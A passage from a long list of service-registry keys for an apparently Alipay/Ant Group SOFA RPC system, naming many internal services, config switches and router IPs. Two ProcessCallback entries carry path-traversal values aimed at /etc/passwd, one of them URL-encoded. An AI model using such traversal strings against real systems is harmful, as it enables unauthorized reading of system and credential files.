curityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.gzone.CommonSerialNoGService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.mng.serial.InfluxSerialNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.rule.InefficiencyRuleDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.api.PositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.TokenConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:infosec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.IdeployQcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.FundQuotationInputFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","revcore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsign:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.core.task.processor.RedoDetailProcessor:1.0:metaqDataRecoverProcessor.default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.taobao.recommendplatform.client.Recommend:1.0:1.0.0.daily@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.159.249.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minicenter.common.service.facade.api.category.MiniCategoryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.control.TwoPhaseBudgetControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmLeadsMainBusinessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrisk.common.service.RiskSwitchDecisionFacade:1.0:gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinTntOutfluxDbQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@girisk#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.ops.datasource.finpwm.finpwmXTradeDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cashbook@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.scheduler.BatchTaskProcessorQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.baseline.BaselineManageChangeRecordApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincoretechdss.service.facade.api.FincoreTechdssAlarmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.process.api.ProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:stocksupervise@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.common.service.falcon.facade.api.TickFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.model.ProcessMngConfiguration:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_KMI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeapcore:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airquery.common.service.facade.mds.MdsHbaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantRelAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_PUBLICCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.biz.alarmanalysis.service.CompatIssueAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acparamcore.common.service.facade.api.manage.ParamColumnManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.appIdKeyParams,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_apiSupportGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.AppAssetViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.point.service.common.ConsumeGoldPointHelpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppMngManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.scene.SceneMngConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.InvoiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.util.mapping.EpOrgIdMappingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoguard.common.service.facade.inspection.api.PcTaskAlarmInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.pcard.api.PCardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebquery.common.facade.service.YebDecisionService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.KbsearchDrmConfigImpl.strNickURL,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:antfeaturecloudcrcen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsEdgeDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.sandboxhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.creditbizcore.common.service.facade.service.CreditEvaluateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bpaas.ecomerchant.facade.staff.admin.StaffAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchmobile.biz.datafuture.datacompass.component.LogicIndexComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbrmp.facade.GfbrmpGeneralLedgerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.config.PipelineGlobalConfigOpenService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mdistinguish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.paymentmng.SHAREDATA_READDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinbaseprod.common.service.facade.api.AntNewSearchServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.ebill.facade.EbillCouponService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.quoteDetailMaxIterTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_KEPLERAPI#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.zpaas.zpaas_remote_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.common.service.facade.ctueventproperty.CtuEventPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.FundFlowConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxDataManageService:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.oto.api.OtotransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@sdchecker#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finadvisorprod.common.service.facade.api.CloudCallQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PAYBATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cloud.apfasmng.common.service.facade.quota.SASQuotaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.zoloz.zprod.face.service.FaceDataRepositoryGzoneService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.facade.InstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.partner.api.InstSaleForbiddenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:minitranscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchasset.common.service.facade.po.AssetPoReRateOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-funsavemoneytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paygrowth.common.service.facade.algorithm.ZhugeAlgorithmRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.fund.facade.api.TaobaoFundAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.disablePurPerPayHappensValidateList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.134.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.feature.common.service.facade.sql.service.FeatureOfflineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:mfgw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.reachshop.ReachShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationEntitySideQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.echox.mirror.service.EchoxMirrorMockDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ifaatam@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.classification.ClassificationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopOutDoorPicSyncMerchantHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.MyBankAccountBizAbilityDRMImpl.openDistributorWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.facade.api.HumanToHumanActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.home.rpc.HomeLbsUserInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:conflict_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.allocation.AstAllocInstElementDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.zdal.ldc.tair.processmngTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mfrontgw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.MultiSlaDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.randomDiscount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.MasterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.search.api.AntSearchPipelineManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ActionLogGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.operation.MiniAppOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.modeltable.ModelDefineRevisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecsign.common.service.facade.product.ProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanbillcore.common.service.facade.bill.api.LbcBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.9.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.zcache.tbase.customerTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmsccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ExecutionNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yunfengdieweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbillcenter.facade.service.unioncard.UnionCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:pcreditCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.orderByRowId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_GFAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.FengdieControlConfig.manualPackageAssignStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcardsales:name=com.alipay.pcardsales.biz.shared.resource.PcardAccountDrmResource.loadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opensupport.common.service.facade.kaproject.MessageManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.blessTaskAppMinVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.93.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csactive.common.service.facade.mng.service.CsactiveOperationLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.write.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.jobbulid.KnowledgeBuildService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.timeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.rank.RankQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_antqa_supportIntelligentSceneGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.common.service.facade.backend.api.BackgroundConsoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:troublehunter_tracerDiagnosisSPI@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalocs:name=com.alipay.zocs.exratecenterOcsCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.crowd.LifeCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.menumng.PortalMenuServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.UserOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.190.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapires.facade.monitor.MonitorlogAccessinfoManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.QtMerchantSspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.bankPidWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:zmbuservice-roleactioncompatiblefacade-managerole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.core.service.repository.AgreementIndexRepositoryGZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:airbops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.DoneOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_KMI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instranscore.common.service.InsPaymentOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.176.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupClusterDbkey.mdap_dds_oss_dev.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.TwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.iaas.IaaSAuthManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkloantrade.common.service.facade.lend.api.LendApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certifymng.service.facade.CreateTestAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gmcore.common.service.facade.api.ArrangementOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zpaas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_EBPP_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.facade.api.contract.ContractRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.OauthCodeServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.core.service.doucode.UserIndexService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.findecision.common.cache.drm.CacheManagerResource.refreshDomains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.EbillFlowControlCallbackFacade:1.0:ccrprodBillReach@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bkpromoscene.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.keymap.facade.asset.api.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.DataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.criskcenter.common.service.facade.strategycore.StrategyCallback:1.0:unique_id@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.143.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.rate.triple.RateImpressionTriple:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FileBridgeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.150.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.180.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininsightcore.common.service.facade.strategy.api.ProfitTargetStategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-graphanalysis#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.forbiddenPolicyString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscenesas.common.service.facade.api.SampleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-quotewrite-meta-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finasmcore.common.service.facade.allocation.DistributionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.xtools.common.service.facade.SNSQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.SystemTransactionIdWhiteListDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InventoryOperationFacade:1.0@DEF